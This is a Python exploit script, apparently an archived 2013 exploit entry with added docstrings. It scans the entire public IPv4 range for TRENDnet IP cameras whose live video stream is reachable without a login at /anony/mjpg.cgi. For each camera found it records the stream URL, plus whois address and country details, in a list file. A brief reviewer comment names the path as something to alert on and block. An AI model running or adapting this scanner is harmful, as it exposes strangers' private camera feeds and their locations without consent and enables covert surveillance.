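# Exploit Title: TRENDNet IP Cam Magic URL Searcher.
# Date: [10/04/2013]
# Author: [SnakingMax]
# Website: http://snakingmax.blogspot.com/
# Category: [Remote Exploit]
# Vulnerability description:
# Bypass the TRENDNet IP Cam authentication protection by using a magic url ^.^
#
# Software Description:
# This software scans Internet to find TRENDNet IP vulnerable cams.
#
# Reviewer note: the whole check is one unauthenticated GET for
# /anony/mjpg.cgi on port 80. That path is what appears in a camera's or a
# reverse proxy's access log, so it is the string to alert on and to block at
# the network edge for devices that cannot be updated.

import ipaddress
from struct import *
from socket import *
from http.client import HTTPConnection
import urllib.request
import subprocess


def isPublicIP(ip):
    """Return True when *ip* is a globally routable unicast IPv4 address.

    Args:
        ip: Dotted-quad IPv4 string, e.g. "203.0.113.7".

    Returns:
        False for loopback, RFC 1918, link-local, shared (100.64.0.0/10),
        documentation, multicast and reserved space; True otherwise.

    Raises:
        OSError: *ip* is not valid IPv4 text (raised by inet_pton).
    """
    # inet_pton keeps the strict dotted-quad parsing and its OSError; the
    # range classification is delegated to the standard library so that
    # non-routable blocks beyond 127/8, 10/8, 172.16/12 and 192.168/16 are
    # rejected too.
    addr = ipaddress.IPv4Address(inet_pton(AF_INET, ip))
    return addr.is_global and not addr.is_multicast and not addr.is_reserved


def isPublicWebcam(ip):
    """Return True when *ip* serves an MJPEG stream at /anony/mjpg.cgi.

    A single GET is sent to port 80 with a 5 second timeout and no
    credentials. The host counts as a match only when the Content-Type header
    equals the multipart value compared below. Any exception (refused
    connection, timeout, malformed reply) is treated as "no match", so this
    function never raises.
    """
    conn = None
    try:
        conn = HTTPConnection(ip, 80, timeout=5)
        conn.request('GET', "/anony/mjpg.cgi")
        response = conn.getresponse()
        try:
            contentType = response.getheader("content-type")
            return contentType == 'multipart/x-mixed-replace;boundary=myboundary'
        finally:
            # Close without reading: a matching reply is an endless stream.
            response.close()
    except Exception:
        # Deliberate best effort: every failure means "not a match".
        return False
    finally:
        # Runs on every path, so the socket is released on errors as well.
        if conn is not None:
            conn.close()


def addThisCamToMyList(camIP):
    """Append one record for *camIP* to CamList.txt in the working directory.

    The record holds the stream URL plus the "address" lines and the first
    "country" line of the `whois` output for the address.

    Raises:
        OSError: CamList.txt cannot be opened, or `whois` is not installed.
        subprocess.CalledProcessError: `whois` exits with a non-zero status.
    """
    # The context manager closes the file even if whois fails part-way.
    with open("CamList.txt", "at") as camlist:
        camlist.write("------------------------WEBCAM------------------------\n")
        # Saving URL.
        camlist.write(" URL: http://" + camIP + "/anony/mjpg.cgi\n")
        # camIP is handed over as a single argv element; no shell is involved.
        whoisInfo = subprocess.check_output(["whois", camIP])
        # Decode the bytes instead of splitting their repr(), which left a
        # leading "b'" on the first line and escaped every non-ASCII byte.
        whoisList = whoisInfo.decode("utf-8", errors="replace").splitlines()
        # Address information; [8:] drops the leading "address:" label.
        for line in whoisList:
            if "address" in line:
                camlist.write(" ADDRESS:\n")
                camlist.write(line[8:] + "\n")
        # Country information: first match only, written to the record
        # rather than printed to stdout.
        for line in whoisList:
            if "country" in line:
                camlist.write(" COUNTRY:\n")
                camlist.write(line[8:] + "\n")
                break
        camlist.write("------------------------------------------------------\n")


if __name__ == "__main__":
    # Generating IP address: a.b.c count down from 255, d runs 1..254.
    for a in reversed(range(256)):
        for b in reversed(range(256)):
            for c in reversed(range(256)):
                for d in range(1, 255):
                    generatedIP = f"{a}.{b}.{c}.{d}"
                    # Check if generated IP is public.
                    if not isPublicIP(generatedIP):
                        continue
                    print("Testing IP: " + generatedIP)
                    # Check if the IP is a webcam.
                    if isPublicWebcam(generatedIP):
                        print(generatedIP + " is a webcam ;-)")
                        # Saving data about the camera into a file.
                        addThisCamToMyList(generatedIP)

# ____ _ _ __ __
# / ___| _ __ __ _| | _(_)_ __ __ _| \/ | __ ___ __
# \___ \| '_ \ / _` | |/ / | '_ \ / _` | |\/| |/ _` \ \/ /
# ___) | | | | (_| | <| | | | | (_| | | | | (_| |> < ____
# ____|____/|_| |_|\__,_|_|\_\_|_| |_|\__, |_| |_|\__,_/_/\_\__/ O \___/
# <\x41\x41\x41\x41\x41\x41\x41\x41\x41|___/\x41\x41\x41\x41\x41______/ \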